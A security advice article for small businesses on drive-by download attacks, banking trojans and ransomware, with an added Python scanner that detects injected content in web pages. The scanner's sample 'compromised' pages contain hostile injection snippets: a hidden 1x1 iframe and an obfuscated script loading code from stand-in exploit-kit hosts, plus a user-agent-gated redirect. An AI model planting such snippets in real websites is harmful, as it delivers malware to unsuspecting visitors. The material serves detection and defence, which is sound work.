What You Need to Know About 'Drive-By' Cyber Attacks

Last year’s epic Sony hack, which the FBI attributed to North Korea, was clearly a big wake-up call for businesses. But for most companies, unless you’re a Fortune 1000 or larger, your biggest threat doesn’t come from these highly sophisticated, targeted attacks. Instead, it’s lower-level actors that pose the greatest danger - cyber-criminals whose goal is to steal or extort money from businesses, and who cause a lot of damage in the process.

One of the top attacks cyber-criminals now use against businesses is the “drive-by download.” Drive-by attacks aren’t entirely new - they’ve been around for a number of years - but recently they’ve accelerated dramatically and are now considered by many leading security companies, including Microsoft, Palo Alto Networks, Kaspersky and Barracuda Labs, to be a top method for criminals to spread malware online to unsuspecting users. These attacks are also becoming more advanced and harder to spot.

What makes the drive-by attack so dangerous is that it can happen to anyone through no fault of their own. Simply visiting a well-known, legitimate website can expose you to this attack. Even worse, drive-by downloads are now closely associated with two of the worst types of malware for small businesses: banking trojans and ransomware. These two particularly virulent strains of malware can cause enormous disruption to companies and may even put SMBs out of business.

Here’s what every SMB owner should know about this threat:

What is a drive-by download?

A drive-by download is a type of cyber attack that targets a person through their Internet browser. It exploits a vulnerability in the browser or in one of its plugins (Flash Player, Java, Adobe Reader and the like) to install malware on the PC as soon as the page loads - no click, download prompt or other action by the user is needed, which is what “drive-by” means. A person can be drawn into a drive-by download attack in two ways: (1) the person is lured into visiting a malicious website set up by criminals; or (2) the person visits a legitimate website that has been compromised without its owner’s knowledge, and that site either serves the exploit directly (often through a malicious ad - so-called “malvertising” - or a pop-up) or silently redirects the person to the criminals’ exploit site.
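What a compromised legitimate page looks like is easier to see in code. The following is an added example, not code from the original article or from Casaba Security: a small Python scanner that reads the HTML a site serves and flags the injection patterns most often used to turn a legitimate page into a drive-by - a hidden or 1x1 iframe that loads content from another host, a meta-refresh or JavaScript redirect to another host, and obfuscated inline script that decodes and writes its payload at runtime. The three sample pages, the page URL and the hostnames in them (the `.invalid` domains) are constructed for the demo, not real sites or attacker infrastructure.

```python
"""Heuristic scanner for drive-by injection patterns in served HTML.

Added example, not from the original article. The sample pages and the
hostnames in them (*.invalid) are constructed for this demo.
"""
import re
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
HIDDEN_STYLE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
DIMENSION_RE = re.compile(r"""\b(?:width|height)\s*=\s*["']?(\d+)""", re.I)
META_REFRESH_RE = re.compile(
    r"""<meta\b[^>]*http-equiv\s*=\s*["']?refresh["']?[^>]*content\s*=\s*["'][^"']*?url=([^"'\s]+)""",
    re.I,
)
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
JS_REDIRECT_RE = re.compile(
    r"""(?:window\.|top\.|self\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']""", re.I
)
OBFUSCATION_MARKERS = [
    re.compile(p, re.I)
    for p in (r"\beval\s*\(", r"\bunescape\s*\(", r"String\.fromCharCode", r"document\.write\s*\(")
]
ENCODED_RUN_RE = re.compile(r"(?:%[0-9a-f]{2}|\\x[0-9a-f]{2}|\\u[0-9a-f]{4}){6,}", re.I)


def _host(url):
    """Hostname of an absolute or protocol-relative URL; '' for a relative path."""
    return urlparse(url).hostname or ""


def scan_html(html, page_url):
    """Return [(kind, detail), ...] for the suspicious constructs found on one page."""
    own_host = _host(page_url)
    findings = []

    # 1. Hidden or 1x1 iframe pulling content from another host: the classic way a
    #    compromised page silently loads an exploit-kit landing page.
    for m in IFRAME_RE.finditer(html):
        attrs = m.group(1)
        src = SRC_RE.search(attrs)
        if not src:
            continue
        target = src.group(1)
        offsite = _host(target) not in ("", own_host)
        tiny = any(int(n) <= 2 for n in DIMENSION_RE.findall(attrs))
        hidden = bool(HIDDEN_STYLE_RE.search(attrs))
        if offsite and (tiny or hidden):
            findings.append(("hidden_iframe", target))

    # 2. Redirect to another host via <meta refresh> or an inline location assignment.
    scripts = [m.group(1) for m in SCRIPT_RE.finditer(html)]
    redirect_targets = [m.group(1) for m in META_REFRESH_RE.finditer(html)]
    for body in scripts:
        redirect_targets += [m.group(1) for m in JS_REDIRECT_RE.finditer(body)]
    for target in redirect_targets:
        if _host(target) not in ("", own_host):
            findings.append(("offsite_redirect", target))

    # 3. Obfuscated inline script: two or more decoding primitives, or one plus a
    #    long encoded run. A heuristic: legitimate pages use document.write too,
    #    so treat hits as candidates for review, not proof of compromise.
    for body in scripts:
        markers = sum(1 for p in OBFUSCATION_MARKERS if p.search(body))
        if markers + bool(ENCODED_RUN_RE.search(body)) >= 2:
            findings.append(("obfuscated_script", body.strip()[:60]))
    return findings


# Constructed sample pages. CLEAN_PAGE embeds a normal off-site video frame and
# must not be flagged; the other two carry the injected constructs described above.
CLEAN_PAGE = """<html><head><title>Acme Widgets</title>
<script src="/static/app.js"></script></head><body><h1>Welcome</h1>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
</body></html>"""

COMPROMISED_PAGE = """<html><head><title>Acme Widgets</title></head><body><h1>Welcome</h1>
<iframe src="http://exploit-kit.invalid/gate.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape("%3Cscript%20src%3D%22http%3A//exploit-kit.invalid/l.js%22%3E%3C/script%3E"));</script>
</body></html>"""

REDIRECT_PAGE = """<html><head>
<meta http-equiv="refresh" content="0; url=http://landing.invalid/go">
<script>if (navigator.userAgent.indexOf("Windows") !== -1) { window.location = "http://landing.invalid/win"; }</script>
</head><body></body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("compromised", COMPROMISED_PAGE), ("redirect", REDIRECT_PAGE)):
        print(name, scan_html(page, "https://www.acme.invalid/"))
```

Two caveats worth keeping in mind if you adapt this to check your own site. First, the checks are heuristics: an off-site 1x1 iframe is how analytics pixels and some ad networks work too, so every hit needs a human look before anyone declares a compromise. Second, exploit kits routinely fingerprint visitors (the user-agent test in `REDIRECT_PAGE` is the mild form of this) and serve clean content to scanners, search-engine crawlers and unfamiliar browsers, so a scanner that fetches pages with a non-browser user agent, or always from the same IP address, may never see the injected code that a customer on a Windows PC is served.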

What type of malware can you get?

Drive-by attacks install a wide range of malicious files on the victim’s computer - it could be a virus, spyware, remote-access tool, keylogger, trojan and more. What is particularly concerning, however, is the drive-by’s propensity for infecting victim PCs with a banking trojan or ransomware.

  • Banking trojans allow the attacker to steal a company’s online banking credentials, which they use to hijack the account. They then perform fraudulent wire transfers to empty out the account. Financial losses stemming from banking trojan infections can be severe and are often not covered by banks. One example is a California escrow firm that declared bankruptcy in 2013 after cyber-criminals stole $1.5 million using banking trojans.
  • Ransomware is a type of virus or trojan that goes through the computer and locks up every file it can find (documents, spreadsheets, PDFs, videos, photos, etc.) with strong encryption that cannot practically be broken without the criminals’ key; it encrypts files on mapped network drives and any connected backup drive as well, not just the local disk. It can also block access to the computer itself. In most cases the only ways to get rid of the ransomware are to wipe the machine and reinstall it (which means losing everything on it that isn’t backed up elsewhere) or to pay the ransom. However, even if you pay, there’s no guarantee the criminals will release your data or that they won’t attack you again.

What sites are most at risk?

Cyber-criminals prefer using well-established, high-traffic websites to conduct their attacks. According to a 2012 study by Barracuda Labs, over 50% of all sites serving drive-by downloads were more than five years old. The same study also found that 25,000 of the world’s most visited sites infected 10.5 million people with drive-by downloads in just one month.

Popular pornography and file-sharing sites often make the list for drive-by download risks, but a number of well-known, legitimate sites have also fallen victim, including: Huffington Post, Google, Microsoft, The New York Times, NBC, LA Weekly, Hasbro, Amnesty International, FHM, AskMen.com, Cracked.com, GameZone, etc.

How can companies protect themselves?

SMBs can reduce their exposure to drive-by attacks by taking several basic, inexpensive precautions:

  • First, make sure all employees are keeping their web browsers and key programs (Flash Player, Adobe Reader, Java, Microsoft Silverlight, etc.) updated with the latest security patches - turn on automatic updates where the software offers them. Better still, uninstall or disable any browser plugin the business doesn’t actually need, and set the rest to “click-to-play,” since unpatched plugins are what most drive-by exploits target. Employees should also be running an ad blocker (such as AdBlock Plus, which cuts off malicious ads and pop-ups) and a script-blocking extension (such as ScriptSafe or NoScript, which stop scripts from running until you allow them). 
  • Try to “segment” the company’s computer network, so that every workstation, server and shared drive isn’t sitting on one flat network with full access to everything else. This limits how far an infection on one PC can spread - ransomware in particular will encrypt every network share the infected machine can reach. 
  • Don’t allow employees to have local administrative access to their computers; instead, set them up with a standard (non-administrator) user account and keep a separate admin account for IT use. Malware dropped by a drive-by runs with the rights of the logged-in user, so a standard account stops it from installing itself system-wide or disabling security software. 
  • Use ‘thin clients’ or Chromebooks if possible. Thin clients keep little or no data on the device itself, and Chromebooks run a locked-down operating system that verifies itself at boot and keeps most user data in the cloud, so the Windows executables that most drive-by attacks deliver simply cannot run on them. This reduces the risk of some types of infection, though it does not remove browser-level risks such as stolen passwords. 
  • Run antivirus or malware detection programs on all machines. 
  • Back up data as frequently as possible to external hard drives that are not left connected to the computer or the network, because ransomware will encrypt any backup drive it can reach. Periodically test that files can actually be restored from the backup. 
  • Don’t login to a banking account from the same computer that is used to surf the web. Have a dedicated machine that does nothing but online banking. This is the best way to limit exposure to malware, like banking trojans.
  • Consider taking out a cyber insurance policy to cover losses and expenses resulting from these types of attacks. 

Jason Glassberg is co-founder of Casaba Security, a white hat hacking firm that performs hacking tests and security consulting for banks, retailers, government agencies and Fortune 500s.